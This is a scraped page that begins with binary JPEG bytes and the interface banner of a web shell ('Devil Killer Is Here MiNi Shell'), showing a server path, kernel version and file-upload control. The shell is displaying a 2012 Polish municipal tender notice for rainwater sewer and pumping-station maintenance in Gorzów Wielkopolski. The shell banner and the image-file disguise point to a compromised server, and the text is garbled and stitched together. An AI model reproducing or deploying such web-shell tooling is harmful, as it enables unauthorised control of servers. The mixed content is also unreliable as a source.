JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121205/491612-N-2012.html

<p class="kh_header"><b>Gorzów Wielkopolski: UTRZYMANIE KANALIZACJI DESZCZOWEJ, PRZEPOMPOWNI WÓD OPADOWYCH, RZEPOMPOWNI MELIORACYJNEJ ZAWARCIE W  GORZOWIE WLKP</b><br>
<b>Numer ogłoszenia: 491612 - 2012; data zamieszczenia: 05.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Gorzów Wlkp. , ul. Sikorskiego 3-4, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7355576, faks 095 7355612.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UTRZYMANIE KANALIZACJI DESZCZOWEJ, PRZEPOMPOWNI WÓD OPADOWYCH, RZEPOMPOWNI MELIORACYJNEJ ZAWARCIE W  GORZOWIE WLKP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi w zakresie utrzymania kanalizacji deszczowej, przepompowni wód opadowych, przepompowni melioracyjnej Zawarcie w Gorzowie Wlkp.
PRZEDMIOT ZAMÓWIENIA SKŁADA SIĘ Z  DWÓCH ZAMÓWIEŃ CZĘŚCIOWYCH.
ZAMÓWIENIE CZĘŚCIOWE NR 1: 
1.Przedmiot zamówienia:
Zamówieniem objęte są usługi związane z utrzymaniem i funkcjonowaniem kanalizacji deszczowej na terenie miasta Gorzowa Wlkp. w zakresie:
1)Czyszczenia studni rewizyjnych i ulicznych studzienek ściekowych.
2)Czyszczenia kanałów i przykanalików sieci kanalizacji deszczowej.
3)Czyszczenia odwodnień liniowych terenu typu ACO-DRAIN.
4)Wymiany uszkodzonych włazów i kratek ściekowych oraz elementów odwodnień liniowych - ACO-DRAIN.
5)Regulacji pionowa włazów i kratek ściekowych.
6)Przeglądu technicznego istniejących i nowobudowanych sieci kanalizacji deszczowych.
7)Przekazania raz na kwartał informacji o liczbie przechowywanych elementów kanalizacji deszczowej oraz o odpadach wytworzonych podczas realizacji zleconych prac. 
8)Przechowywania w magazynie Wykonawcy elementów kanalizacji deszczowej pochodzących z demontażu np.: kratki, włazy, zbiornik o wymiarach 4300x1500x1800 (separator).
9)Raz w roku na podstawie spisanego protokołu pomiędzy Wykonawcą a Zamawiającym należy zdać do punktu skupu złomu uszkodzone elementy kanalizacji deszczowej nie nadające się do ponownego zastosowania i uzyskać dowód przyjęcia złomu uprawniającego do wystawiania przez Wydział Infrastruktury Miejskiej faktury  sprzedaży.
10)W uzgodnieniu z Zamawiającym na podstawie art.62 Prawa budowlanego dokonania przeglądów sieci kanalizacji deszczowej i zgodnie z art.64 Prawa budowlanego dokonanie wpisów dotyczących zrealizowanych przez Wykonawcę usług polegających na: naprawie, czyszczeniu, inspekcji i ocenie stanu technicznego kolektorów w przekazanych przez Zamawiającego książkach obiektów budowlanych.
Długość sieci kanalizacji deszczowej wynosi  w przybliżeniu 260 kilometry.
Studni rewizyjnych kanalizacji deszczowej jest ok. 9 000 sztuk.
Wpustów ulicznych kanalizacji deszczowej jest ok. 5 000 sztuk.
ZAMÓWIENIE CZĘŚCIOWE NR 2:
1.Przedmiot zamówienia:
Przedmiotem zamówienia objęte jest  utrzymanie przepompowni wód opadowych i przepompowni melioracyjnej Zawarcie na terenie miasta Gorzowa Wlkp. zlokalizowanych:
a) przepompownie wód opadowych: 
- ul. Kasprzaka, 
- ul. Błotna,
- ul. Bierzarina, 
- ul. Piłsudskiego, 
- ul. Wał Okrężny WDK,
- ul. Wał Okrężny BP
- ul. Strażacka,
- ul. Złotego Smoka
b) przepompownia melioracyjna Zawarcie:
- u zbiegu Wału Okrężnego i  Poprzecznego.
UWAGA:
Przepompownia przy ul. Wał Okrężny BP nie została jeszcze przekazana do eksploatacji; planowany  czas odbioru przepompowni został wyznaczony na dzień 15.12.2012r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w stosunku do zamówień podstawowych opisanych w SIWZ polegających na powtórzeniu tego samego rodzaju zamówień dla wszystkich dwóch zadań częściowych, opisanych w niniejszej SIWZ, zgodnie z Art. 67 ust. 1 pkt 6 stawy  Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.48.00.00-5, 50.80.00.00-3, 50.51.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMÓWIENIE CZĘŚCIOWE NR 1:  5.000 zł (słownie złotych: pięć tysięcy)
ZAMÓWIENIE CZĘŚCIOWE NR 2:  1.000 zł (słownie: jeden tysiąc złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMÓWIENIE CZĘŚCIOWE NR 1:
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają aktualne zezwolenie w zakresie gospodarowania odpadami komunalnymi (zbieranie, transport, odzysk lub unieszkodliwianie) lub podpisaną umowę  z firmą posiadającą takie uprawnienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMÓWIENIE CZĘŚCIOWE NR 1:
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykonali/ wykonują w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie usługi w ulicach miasta w ruchu ulicznym zgodne z przedmiotem zamówienia - przy czym umowa na realizację usługi winna trwać nieprzerwanie przez okres minimum sześciu miesięcy -  i załączyli dokumenty potwierdzające, że usługa ta została należycie wykonana, (np. referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują odpowiednim potencjałem technicznym zdolnymi do wykonania zamówienia (Zamawiający określa niezbędne minimum sprzętu) tj.:
ZAMÓWIENIE CZĘŚCIOWE NR 1:
- samochód ascenizacyjny - 2 sztuki,
- samochód ciśnieniowy - 2 sztuki,
- samochód wyposażony w oprzyrządowanie do kamerownia sieci kanalizacji o średnicach od 150mm  do 1800 mm - 1 szt.
- koparka - 1 sztuka,
- samochód dostawczy - 1 sztuka,
- sprężarka - 2 sztuki,
- agregat prądotwórczy - 2 sztuki,
- samochód skrzyniowy lub samowyładowczy - 1 sztuka,
- młoty pneumatyczne - 2 sztuki,
- pilarka - 1 sztuka.
ZAMÓWIENIE CZĘŚCIOWE NR 2:
- samochód dostawczy - 1 szt.,
- wciągarkę elektryczną - 1 szt.,
- przyrządy do: pomiaru stanu izolacji, pomiaru skuteczności ochrony przeciwpożarowej, do pomiaru instalacji odgromowej - 1 kpl.,
- kompletnie wyposażony warsztat elektroniczny, przystosowany do sprawdzenia sterowników oraz pomiarów sieci kablowych - 1 kpl.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia lub będą dysponować takimi osobami i przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, posiadających niezbędne kwalifikacje tj.:  
ZAMÓWIENIE CZĘŚCIOWE NR 1: (minimum 5 osób) 
- co najmniej jeden z pracowników  powinien posiadać uprawnienia budowlane do kierowania robotami w branży sanitarnej, 
-  co najmniej dwóch pracowników z uprawnieniami do obsługi wozów ciśnieniowych,
- co najmniej dwóch pracowników z uprawnieniami do obsługi wozów asenizacyjnych.
ZAMÓWIENIE CZĘŚCIOWE NR 2: (minimum 3 osoby) 
- minimum 1 osoba nadzorująca prace, posiadająca uprawnienia w zakresie dozoru nad eksploatacją urządzeń elektrycznych;
- minimum 2 osoby posiadające ważne świadectwa kwalifikacyjne SEP uprawniające do zajmowania się eksploatacją urządzeń, instalacji  i sieci na stanowiska eksploatacji do 1 kV,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Upoważnienie dla osoby reprezentującej Wykonawcę, o ile nie wynika to z innych dokumentów. W przypadku zawiązania konsorcjum należy załączyć pełnomocnictwo dla podmiotu reprezentującego kilku Wykonawców. 2.Pisemne zobowiązanie podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia 3. Zakres zamówienia, który zostanie zlecony podwykonawcom. 4.Dowód wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dla ZAMÓWIENIA CZĘŚCIOWEGO NR 1:
Zamawiający dopuszcza zmianę postanowień umowy, w następujących przypadkach:
- w związku z zaistnieniem okoliczności, których wystąpienia Zamawiający i Wykonawca nie przewidywali w chwili zawierania umowy,
- wskazane okoliczności nie mogą być wywołane zarówno przez Zamawiającego, jak i Wykonawcę, ani przez nich zawinione i muszą wywoływać ten skutek, iż umowa nie będzie mogła być wykonana wedle pierwotnej treści, w szczególności z uwagi na rażącą stratę grożącą jednej ze stron lub niemożności osiągnięcia celu umowy.
- okoliczności te odnosić się mogą w szczególności do wystąpienia:
a)nagłych zmian stanu prawnego, zmian przepisów prawa, norm i standardów albo zmian w wiedzy technicznej;
b)konieczności czasowego wstrzymania wykonania przedmiotu umowy przez Zamawiającego;
c)wystąpienia innych okoliczności niezależnych od Wykonawcy tj.:
- niesprzyjające warunki atmosferyczne, skutkujących niemożliwością dotrzymania terminu realizacji umowy,
- zdarzenia losowe np. powódź, uniemożliwiające wykonanie zamówienia w terminie,
d) okoliczności korzystne dla Zamawiającego uzasadniające przyspieszenie lub opóźnienie prac np. zabezpieczenie przeciwpowodziowe miasta, z uwagi na ostrzeżenia przed zdarzeniem losowym.
Dla ZAMÓWIENIA CZĘŚCIOWEGO NR 2:
Zamawiający dopuszcza zmianę postanowień umowy, w następujących przypadkach:
- w związku z zaistnieniem okoliczności, których wystąpienia Zamawiający i Wykonawca nie przewidywali w chwili zawierania umowy,
- wskazane okoliczności nie mogą być wywołane zarówno przez Zamawiającego, jak i Wykonawcę, ani przez nich zawinione i muszą wywoływać ten skutek, iż umowa nie będzie mogła być wykonana wedle pierwotnej treści, w szczególności z uwagi na rażącą stratę grożącą jednej ze stron lub niemożności osiągnięcia celu umowy.
- okoliczności te odnosić się mogą w szczególności do wystąpienia:
a)nagłych zmian stanu prawnego, zmian przepisów prawa, norm i standardów albo zmian w wiedzy technicznej;
b)konieczności czasowego wstrzymania wykonania Przedmiotu umowy przez Zamawiającego;
c)wystąpienia innych okoliczności niezależnych od Wykonawcy tj.:
- niesprzyjające warunki atmosferyczne, skutkujących niemożliwością dotrzymania terminu realizacji umowy,
- zdarzenia losowe np. powódź, uniemożliwiające wykonanie zamówienia w terminie,
 d) okoliczności korzystne dla Zamawiającego uzasadniające przyspieszenie lub opóźnienie prac np. zabezpieczenie przeciwpowodziowe miasta, z uwagi na ostrzeżenia przed zdarzeniem losowym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gorzow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Gorzowa Wlkp.; ul. Sikorskiego 3-4; 66-400 Gorzów Wlkp.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2012 godzina 10:00, miejsce: Urząd Miasta Gorzowa Wlkp. 66-400 Gorzów Wlkp. ul. Sikorskiego 3-4, Kancelaria Ogólna (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie kanalizacji deszczowej na terenie miasta Gorzowa Wlkp.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia:
Zamówieniem objęte są usługi związane z utrzymaniem i funkcjonowaniem kanalizacji deszczowej na terenie miasta Gorzowa Wlkp. w zakresie:
1)Czyszczenia studni rewizyjnych i ulicznych studzienek ściekowych.
2)Czyszczenia kanałów i przykanalików sieci kanalizacji deszczowej.
3)Czyszczenia odwodnień liniowych terenu typu ACO-DRAIN.
4)Wymiany uszkodzonych włazów i kratek ściekowych oraz elementów odwodnień liniowych - ACO-DRAIN.
5)Regulacji pionowa włazów i kratek ściekowych.
6)Przeglądu technicznego istniejących i nowobudowanych sieci kanalizacji deszczowych.
7)Przekazania raz na kwartał informacji o liczbie przechowywanych elementów kanalizacji deszczowej oraz o odpadach wytworzonych podczas realizacji zleconych prac. 
8)Przechowywania w magazynie Wykonawcy elementów kanalizacji deszczowej pochodzących z demontażu np.: kratki, włazy, zbiornik o wymiarach 4300x1500x1800 (separator).
9)Raz w roku na podstawie spisanego protokołu pomiędzy Wykonawcą a Zamawiającym należy zdać do punktu skupu złomu uszkodzone elementy kanalizacji deszczowej nie nadające się do ponownego zastosowania i uzyskać dowód przyjęcia złomu uprawniającego do wystawiania przez Wydział Infrastruktury Miejskiej faktury  sprzedaży.
10)W uzgodnieniu z Zamawiającym na podstawie art.62 Prawa budowlanego dokonania przeglądów sieci kanalizacji deszczowej i zgodnie z art.64 Prawa budowlanego dokonanie wpisów dotyczących zrealizowanych przez Wykonawcę usług polegających na: naprawie, czyszczeniu, inspekcji i ocenie stanu technicznego kolektorów w przekazanych przez Zamawiającego książkach obiektów budowlanych.
Długość sieci kanalizacji deszczowej wynosi  w przybliżeniu 260 kilometry.
Studni rewizyjnych kanalizacji deszczowej jest ok. 9 000 sztuk.
Wpustów ulicznych kanalizacji deszczowej jest ok. 5 000 sztuk.
2. Szczegółowy zakres  zamówienia
1). CZYSZCZENIE WPUSTU ULICZNEGO -  jednostka: 1 szt.
Wyszczególnienie robót:
1)zdjęcie kratki ściekowej,
2)wyjęcie osadu z osadnika wpustu deszczowego,
3)udrożnienie przykanalika,
4)założenie kratki ściekowej,
5)wykonanie prac porządkowych.
1.1) USUWANIE ZANIECZYSZCZEŃ Z KOSZY ZAINSTALOWANYCH WE WPUSTACH -  jednostka: 1 szt. 
Wyszczególnienie robót:
1)zdjęcie kratki ściekowej,
2)wyjęcie kosza z osadnika wpustu deszczowego,
3)usunięcie zanieczyszczeń z kosza
4)założenie kosza i kratki ściekowej,
5)wykonanie prac porządkowych.
2). CZYSZCZENIE WPUSTU PODCHODNIKOWEGO-  jednostka: 1 szt.
Wyszczególnienie robót:
1)zdjęcie płyty
2)wyjęcie osadu z osadnika wpustu deszczowego,
3)udrożnienie przykanalika,
4)założenie płyty
5)wykonanie prac porządkowych.
3). UDROŻNIENIE KANALIZACJI BURZOWEJ -  jednostka: 1 mb
Wyszczególnienie robót:
1)otwarcie pokrywy włazu studni rewizyjnej,
2)wprowadzenie urządzeń czyszczących do kanału,
3)oczyszczenie kanału z osadu,
4)wybranie ze studni osadu,
5)zamknięcie pokrywy włazu studni rewizyjnej, wykonanie prac porządkowych.
3.1   fi 200 do < fi 300 mm
3.2   fi 300 do < fi 400 mm
3.3   fi 400 do < fi 500 mm
3.4   fi 500 do < fi 600 mm
3.5   fi 600 do < fi 800 mm
3.6   fi 800 do < fi 1000 mm
3.7   fi 1000 do < fi 1200 mm
3.8   fi 1200 do < fi 1400 mm
3.9   fi 1400 do < fi 1800 mm
3.10 fi 1800 mm
3.1) UDRAZNIANIE ODWODNIENIA LINIOWEGO ACO-DRAIN
Wyszczególnienie robót:
1)otworzenie rusztów z koryt ACO-DRAIN,
2) oczyszczenie koryta z osadu,
3)zamknięcie koryt poprzez zamocowanie rusztów,
4)wykonanie prac porządkowych
4). CZYSZCZENIE STUDNI REWIZYJNEJ i CHŁONNEJ - jednostka: 1 szt.
Wyszczególnienie robót:
1)zdjęcie pokrywy włazowej,
2)wyjęcie osadu ze studni,
3)założenie pokrywy włazowej,
4)wykonanie prac porządkowych.
5) NAPRAWY BIEŻĄCE
5.1). Regulacja  pionowa wpustu ulicznego z materiałem z zabezpieczeniem (rygiel, zawias, zatrzask) klasy D400 - jednostka: 1 szt.
Wyszczególnienie robót:
1)zdjęcie kratki ściekowej,
2)usunięcie osadu,
3)rozebranie uszkodzonej górnej części studzienki,
4)odkucie uszkodzonej nawierzchni i podbudowy wokół urządzenia,
5)zebranie i odrzucenie gruzu na pobocze,
6)wykonanie deskowania,
7)ułożenie i zagęszczenie betonu,
8)rozebranie deskowania,
9)osadzenie kratki ściekowej na zaprawie cementowej wraz z jej przygotowaniem,
10)uzupełnienie masą asfaltową do niwelety nawierzchni,
11)wykonanie prac porządkowych. 
5.2). Regulacja  pionowa wpustu ulicznego bez materiału - jednostka: 1 szt.
